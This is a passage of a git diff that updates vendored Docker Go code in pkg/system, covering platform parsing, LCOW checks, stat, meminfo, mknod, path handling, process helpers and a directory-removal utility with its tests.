platform.OSVersion != "" { + return fmt.Errorf("invalid platform osversion %q", platform.OSVersion) + } + if platform.Variant != "" { + return fmt.Errorf("invalid platform variant %q", platform.Variant) + } + return nil +} + +// ParsePlatform parses a platform string in the format os[/arch[/variant] +// into an OCI image-spec platform structure. +// TODO This is a temporary function - can be replaced by parsing from +// https://github.com/containerd/containerd/pull/1403/files at a later date. +// @jhowardmsft +func ParsePlatform(in string) *specs.Platform { + p := &specs.Platform{} + elements := strings.SplitN(strings.ToLower(in), "/", 3) + if len(elements) == 3 { + p.Variant = elements[2] + } + if len(elements) >= 2 { + p.Architecture = elements[1] + } + if len(elements) >= 1 { + p.OS = elements[0] + } + return p +} + +// IsOSSupported determines if an operating system is supported by the host +func IsOSSupported(os string) bool { + if runtime.GOOS == os { + return true + } + if LCOWSupported() && os == "linux" { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_unix.go b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go new file mode 100644 index 0000000000..26397fb8a1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package system // import "github.com/docker/docker/pkg/system" + +// LCOWSupported returns true if Linux containers on Windows are supported. +func LCOWSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_windows.go b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go new file mode 100644 index 0000000000..f0139df8f7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go @@ -0,0 +1,6 @@ +package system // import "github.com/docker/docker/pkg/system" + +// LCOWSupported returns true if Linux containers on Windows are supported. +func LCOWSupported() bool { + return lcowSupported +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go similarity index 84% rename from vendor/github.com/docker/docker/pkg/system/lstat.go rename to vendor/github.com/docker/docker/pkg/system/lstat_unix.go index bd23c4d50b..7477995f1b 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go index 062cf53bfe..9fb4a191cf 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go index 49e87eb40b..359c791d9b 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go @@ -1,25 +1,14 @@ -// +build windows +package system // import "github.com/docker/docker/pkg/system" -package system - -import ( - "os" -) +import "os" // Lstat calls os.Lstat to get a fileinfo interface back. // This is then copied into our own locally defined structure. -// Note the Linux version uses fromStatT to do the copy back, -// but that not strictly necessary when already in an OS specific module. func Lstat(path string) (*StatT, error) { fi, err := os.Lstat(path) if err != nil { return nil, err } - return &StatT{ - name: fi.Name(), - size: fi.Size(), - mode: fi.Mode(), - modTime: fi.ModTime(), - isDir: fi.IsDir()}, nil + return fromStatT(&fi) } diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go index 3b6e947e67..6667eb84dc 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" // MemInfo contains memory statistics of the host system. type MemInfo struct { diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go index 385f1d5e73..d79e8b0765 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "bufio" diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go deleted file mode 100644 index 7f4f84f73a..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go +++ /dev/null @@ -1,128 +0,0 @@ -// +build solaris,cgo - -package system - -import ( - "fmt" - "unsafe" -) - -// #cgo LDFLAGS: -lkstat -// #include -// #include -// #include -// #include -// #include -// #include -// struct swaptable *allocSwaptable(int num) { -// struct swaptable *st; -// struct swapent *swapent; -// st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int)); -// swapent = st->swt_ent; -// for (int i = 0; i < num; i++,swapent++) { -// swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char)); -// } -// st->swt_n = num; -// return st; -//} -// void freeSwaptable (struct swaptable *st) { -// struct swapent *swapent = st->swt_ent; -// for (int i = 0; i < st->swt_n; i++,swapent++) { -// free(swapent->ste_path); -// } -// free(st); -// } -// swapent_t getSwapEnt(swapent_t *ent, int i) { -// return ent[i]; -// } -// int64_t getPpKernel() { -// int64_t pp_kernel = 0; -// kstat_ctl_t *ksc; -// kstat_t *ks; -// kstat_named_t *knp; -// kid_t kid; -// -// if ((ksc = kstat_open()) == NULL) { -// return -1; -// } -// if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) { -// return -1; -// } -// if (((kid = kstat_read(ksc, ks, NULL)) == -1) || -// ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) { -// return -1; -// } -// switch (knp->data_type) { -// case KSTAT_DATA_UINT64: -// pp_kernel = knp->value.ui64; -// break; -// case KSTAT_DATA_UINT32: -// pp_kernel = knp->value.ui32; -// break; -// } -// pp_kernel *= sysconf(_SC_PAGESIZE); -// return (pp_kernel > 0 ? pp_kernel : -1); -// } -import "C" - -// Get the system memory info using sysconf same as prtconf -func getTotalMem() int64 { - pagesize := C.sysconf(C._SC_PAGESIZE) - npages := C.sysconf(C._SC_PHYS_PAGES) - return int64(pagesize * npages) -} - -func getFreeMem() int64 { - pagesize := C.sysconf(C._SC_PAGESIZE) - npages := C.sysconf(C._SC_AVPHYS_PAGES) - return int64(pagesize * npages) -} - -// ReadMemInfo retrieves memory statistics of the host system and returns a -// MemInfo type. -func ReadMemInfo() (*MemInfo, error) { - - ppKernel := C.getPpKernel() - MemTotal := getTotalMem() - MemFree := getFreeMem() - SwapTotal, SwapFree, err := getSysSwap() - - if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 || - SwapFree < 0 { - return nil, fmt.Errorf("error getting system memory info %v\n", err) - } - - meminfo := &MemInfo{} - // Total memory is total physical memory less than memory locked by kernel - meminfo.MemTotal = MemTotal - int64(ppKernel) - meminfo.MemFree = MemFree - meminfo.SwapTotal = SwapTotal - meminfo.SwapFree = SwapFree - - return meminfo, nil -} - -func getSysSwap() (int64, int64, error) { - var tSwap int64 - var fSwap int64 - var diskblksPerPage int64 - num, err := C.swapctl(C.SC_GETNSWP, nil) - if err != nil { - return -1, -1, err - } - st := C.allocSwaptable(num) - _, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st)) - if err != nil { - C.freeSwaptable(st) - return -1, -1, err - } - - diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT) - for i := 0; i < int(num); i++ { - swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i)) - tSwap += int64(swapent.ste_pages) * diskblksPerPage - fSwap += int64(swapent.ste_free) * diskblksPerPage - } - C.freeSwaptable(st) - return tSwap, fSwap, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go index 44f5562882..c3690d6311 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go index 3ce019dffd..56f4494268 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!windows,!solaris +// +build !linux,!windows -package system +package system // import "github.com/docker/docker/pkg/system" // ReadMemInfo is not supported on platforms other than linux and windows. func ReadMemInfo() (*MemInfo, error) { diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go index 883944a4c5..6ed93f2fe2 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "unsafe" diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go index 73958182b4..b132482e03 100644 --- a/vendor/github.com/docker/docker/pkg/system/mknod.go +++ b/vendor/github.com/docker/docker/pkg/system/mknod.go @@ -1,15 +1,15 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "golang.org/x/sys/unix" ) // Mknod creates a filesystem node (file, device special file or named pipe) named path // with attributes specified by mode and dev. func Mknod(path string, mode uint32, dev int) error { - return syscall.Mknod(path, mode, dev) + return unix.Mknod(path, mode, dev) } // Mkdev is used to build the value of linux devices (in /dev/) which specifies major @@ -18,5 +18,5 @@ func Mknod(path string, mode uint32, dev int) error { // They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major, // then the top 12 bits of the minor. func Mkdev(major int64, minor int64) uint32 { - return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff)) + return uint32(unix.Mkdev(uint32(major), uint32(minor))) } diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go index 2e863c0215..ec89d7a15e 100644 --- a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" // Mknod is not implemented on Windows. func Mknod(path string, mode uint32, dev int) error { diff --git a/vendor/github.com/docker/docker/pkg/system/path.go b/vendor/github.com/docker/docker/pkg/system/path.go new file mode 100644 index 0000000000..a3d957afab --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path.go @@ -0,0 +1,60 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "fmt" + "path/filepath" + "runtime" + "strings" + + "github.com/containerd/continuity/pathdriver" +) + +const defaultUnixPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + +// DefaultPathEnv is unix style list of directories to search for +// executables. Each directory is separated from the next by a colon +// ':' character . +func DefaultPathEnv(os string) string { + if runtime.GOOS == "windows" { + if os != runtime.GOOS { + return defaultUnixPathEnv + } + // Deliberately empty on Windows containers on Windows as the default path will be set by + // the container. Docker has no context of what the default path should be. + return "" + } + return defaultUnixPathEnv + +} + +// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, +// is the system drive. +// On Linux: this is a no-op. +// On Windows: this does the following> +// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. +// This is used, for example, when validating a user provided path in docker cp. +// If a drive letter is supplied, it must be the system drive. The drive letter +// is always removed. Also, it translates it to OS semantics (IOW / to \). We +// need the path in this syntax so that it can ultimately be concatenated with +// a Windows long-path which doesn't support drive-letters. Examples: +// C: --> Fail +// C:\ --> \ +// a --> a +// /a --> \a +// d:\ --> Fail +func CheckSystemDriveAndRemoveDriveLetter(path string, driver pathdriver.PathDriver) (string, error) { + if runtime.GOOS != "windows" || LCOWSupported() { + return path, nil + } + + if len(path) == 2 && string(path[1]) == ":" { + return "", fmt.Errorf("No relative path specified in %q", path) + } + if !driver.IsAbs(path) || len(path) < 2 { + return filepath.FromSlash(path), nil + } + if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { + return "", fmt.Errorf("The specified path is not on the system drive (C:)") + } + return filepath.FromSlash(path[2:]), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go deleted file mode 100644 index c607c4db09..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/path_unix.go +++ /dev/null @@ -1,14 +0,0 @@ -// +build !windows - -package system - -// DefaultPathEnv is unix style list of directories to search for -// executables. Each directory is separated from the next by a colon -// ':' character . -const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - -// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, -// is the system drive. This is a no-op on Linux. -func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { - return path, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go deleted file mode 100644 index cbfe2c1576..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/path_windows.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build windows - -package system - -import ( - "fmt" - "path/filepath" - "strings" -) - -// DefaultPathEnv is deliberately empty on Windows as the default path will be set by -// the container. Docker has no context of what the default path should be. -const DefaultPathEnv = "" - -// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. -// This is used, for example, when validating a user provided path in docker cp. -// If a drive letter is supplied, it must be the system drive. The drive letter -// is always removed. Also, it translates it to OS semantics (IOW / to \). We -// need the path in this syntax so that it can ultimately be contatenated with -// a Windows long-path which doesn't support drive-letters. Examples: -// C: --> Fail -// C:\ --> \ -// a --> a -// /a --> \a -// d:\ --> Fail -func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { - if len(path) == 2 && string(path[1]) == ":" { - return "", fmt.Errorf("No relative path specified in %q", path) - } - if !filepath.IsAbs(path) || len(path) < 2 { - return filepath.FromSlash(path), nil - } - if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { - return "", fmt.Errorf("The specified path is not on the system drive (C:)") - } - return filepath.FromSlash(path[2:]), nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go index eccb26aaea..974707eb71 100644 --- a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go @@ -1,19 +1,24 @@ // +build windows -package system +package system // import "github.com/docker/docker/pkg/system" -import "testing" +import ( + "testing" + + "github.com/containerd/continuity/pathdriver" +) // TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { // Fails if not C drive. - path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`) + _, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`, pathdriver.LocalPathDriver) if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") { t.Fatalf("Expected error for d:") } // Single character is unchanged - if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil { + var path string + if path, err = CheckSystemDriveAndRemoveDriveLetter("z", pathdriver.LocalPathDriver); err != nil { t.Fatalf("Single character should pass") } if path != "z" { @@ -21,7 +26,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Two characters without colon is unchanged - if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter("AB", pathdriver.LocalPathDriver); err != nil { t.Fatalf("2 characters without colon should pass") } if path != "AB" { @@ -29,7 +34,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Abs path without drive letter - if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("abs path no drive letter should pass") } if path != `\l` { @@ -37,7 +42,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Abs path without drive letter, linux style - if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("abs path no drive letter linux style should pass") } if path != `\l` { @@ -45,7 +50,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Drive-colon should be stripped - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("An absolute path should pass") } if path != `\` { @@ -53,7 +58,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Verify with a linux-style path - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("An absolute path should pass") } if path != `\` { @@ -61,7 +66,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Failure on c: - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`, pathdriver.LocalPathDriver); err == nil { t.Fatalf("c: should fail") } if err.Error() != `No relative path specified in "c:"` { @@ -69,7 +74,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Failure on d: - if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`, pathdriver.LocalPathDriver); err == nil { t.Fatalf("c: should fail") } if err.Error() != `No relative path specified in "d:"` { diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/pkg/system/process_unix.go similarity index 50% rename from vendor/github.com/docker/docker/utils/process_unix.go rename to vendor/github.com/docker/docker/pkg/system/process_unix.go index fc0b1c8b74..0195a891b2 100644 --- a/vendor/github.com/docker/docker/utils/process_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/process_unix.go @@ -1,15 +1,17 @@ -// +build linux freebsd solaris +// +build linux freebsd darwin -package utils +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" + + "golang.org/x/sys/unix" ) // IsProcessAlive returns true if process with a given pid is running. func IsProcessAlive(pid int) bool { - err := syscall.Kill(pid, syscall.Signal(0)) - if err == nil || err == syscall.EPERM { + err := unix.Kill(pid, syscall.Signal(0)) + if err == nil || err == unix.EPERM { return true } @@ -18,5 +20,5 @@ func IsProcessAlive(pid int) bool { // KillProcess force-stops a process. func KillProcess(pid int) { - syscall.Kill(pid, syscall.SIGKILL) + unix.Kill(pid, unix.SIGKILL) } diff --git a/vendor/github.com/docker/docker/pkg/system/process_windows.go b/vendor/github.com/docker/docker/pkg/system/process_windows.go new file mode 100644 index 0000000000..4e70c97b18 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/process_windows.go @@ -0,0 +1,18 @@ +package system // import "github.com/docker/docker/pkg/system" + +import "os" + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + _, err := os.FindProcess(pid) + + return err == nil +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + p, err := os.FindProcess(pid) + if err == nil { + p.Kill() + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/rm.go b/vendor/github.com/docker/docker/pkg/system/rm.go new file mode 100644 index 0000000000..02e4d26221 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/rm.go @@ -0,0 +1,80 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "os" + "syscall" + "time" + + "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" +) + +// EnsureRemoveAll wraps `os.RemoveAll` to check for specific errors that can +// often be remedied. +// Only use `EnsureRemoveAll` if you really want to make every effort to remove +// a directory. +// +// Because of the way `os.Remove` (and by extension `os.RemoveAll`) works, there +// can be a race between reading directory entries and then actually attempting +// to remove everything in the directory. +// These types of errors do not need to be returned since it's ok for the dir to +// be gone we can just retry the remove operation. +// +// This should not return a `os.ErrNotExist` kind of error under any circumstances +func EnsureRemoveAll(dir string) error { + notExistErr := make(map[string]bool) + + // track retries + exitOnErr := make(map[string]int) + maxRetry := 50 + + // Attempt to unmount anything beneath this dir first + mount.RecursiveUnmount(dir) + + for { + err := os.RemoveAll(dir) + if err == nil { + return err + } + + pe, ok := err.(*os.PathError) + if !ok { + return err + } + + if os.IsNotExist(err) { + if notExistErr[pe.Path] { + return err + } + notExistErr[pe.Path] = true + + // There is a race where some subdir can be removed but after the parent + // dir entries have been read. + // So the path could be from `os.Remove(subdir)` + // If the reported non-existent path is not the passed in `dir` we + // should just retry, but otherwise return with no error. + if pe.Path == dir { + return nil + } + continue + } + + if pe.Err != syscall.EBUSY { + return err + } + + if mounted, _ := mount.Mounted(pe.Path); mounted { + if e := mount.Unmount(pe.Path); e != nil { + if mounted, _ := mount.Mounted(pe.Path); mounted { + return errors.Wrapf(e, "error while removing %s", dir) + } + } + } + + if exitOnErr[pe.Path] == maxRetry { + return err + } + exitOnErr[pe.Path]++ + time.Sleep(100 * time.Millisecond) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/rm_test.go b/vendor/github.com/docker/docker/pkg/system/rm_test.go new file mode 100644 index 0000000000..0448aac619 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/rm_test.go @@ -0,0 +1,84 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" + "time" + + "github.com/docker/docker/pkg/mount" + "gotest.tools/skip" +) + +func TestEnsureRemoveAllNotExist(t *testing.T) { + // should never return an error for a non-existent path + if err := EnsureRemoveAll("/non/existent/path"); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithDir(t *testing.T) { + dir, err := ioutil.TempDir("", "test-ensure-removeall-with-dir") + if err != nil { + t.Fatal(err) + } + if err := EnsureRemoveAll(dir); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithFile(t *testing.T) { + tmp, err := ioutil.TempFile("", "test-ensure-removeall-with-dir") + if err != nil { + t.Fatal(err) + } + tmp.Close() + if err := EnsureRemoveAll(tmp.Name()); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithMount(t *testing.T) { + skip.If(t, runtime.GOOS == "windows", "mount not supported on Windows") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + + dir1, err := ioutil.TempDir("", "test-ensure-removeall-with-dir1") + if err != nil { + t.Fatal(err) + } + dir2, err := ioutil.TempDir("", "test-ensure-removeall-with-dir2") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir2) + + bindDir := filepath.Join(dir1, "bind") + if err := os.MkdirAll(bindDir, 0755); err != nil { + t.Fatal(err) + } + + if err := mount.Mount(dir2, bindDir, "none", "bind"); err != nil { + t.Fatal(err) + } + + done := make(chan struct{}) + go func() { + err = EnsureRemoveAll(dir1) + close(done) + }() + + select { + case <-done: + if err != nil { + t.Fatal(err) + } + case <-time.After(5 * time.Second): + t.Fatal("timeout waiting for EnsureRemoveAll to finish") + } + + if _, err := os.Stat(dir1); !os.IsNotExist(err) { + t.Fatalf("expected %q to not exist", dir1) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go index f0742f59e5..c1c0ee9f38 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go @@ -1,10 +1,8 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), @@ -13,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtimespec}, nil } - -// FromStatT loads a system.StatT from a syscall.Stat_t. -func FromStatT(s *syscall.Stat_t) (*StatT, error) { - return fromStatT(s) -} - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. -// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go index d0fb6f1519..c1c0ee9f38 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go @@ -1,8 +1,6 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" // fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { @@ -13,15 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtimespec}, nil } - -// Stat takes a path to a file and returns -// a system.Stat_t type pertaining to that file. -// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go index 8b1eded138..98c9eb18d1 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go @@ -1,8 +1,6 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" // fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { @@ -14,20 +12,8 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { mtim: s.Mtim}, nil } -// FromStatT exists only on linux, and loads a system.StatT from a -// syscal.Stat_t. +// FromStatT converts a syscall.Stat_t type to a system.Stat_t type +// This is exposed on Linux as pkg/archive/changes uses it. func FromStatT(s *syscall.Stat_t) (*StatT, error) { return fromStatT(s) } - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. -// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go index 3c3b71fb21..756b92d1e6 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go @@ -1,10 +1,8 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go index 0216985a25..756b92d1e6 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go @@ -1,12 +1,8 @@ -// +build solaris +package system // import "github.com/docker/docker/pkg/system" -package system +import "syscall" -import ( - "syscall" -) - -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), @@ -15,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtim}, nil } - -// FromStatT loads a system.StatT from a syscal.Stat_t. -func FromStatT(s *syscall.Stat_t) (*StatT, error) { - return fromStatT(s) -} - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. -// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat_unix.go similarity index 63% rename from vendor/github.com/docker/docker/pkg/system/stat.go rename to vendor/github.com/docker/docker/pkg/system/stat_unix.go index 087034c5ec..3d7e2ebbef 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" @@ -47,7 +47,19 @@ func (s StatT) Mtim() syscall.Timespec { return s.mtim } -// GetLastModification returns file's last modification time. 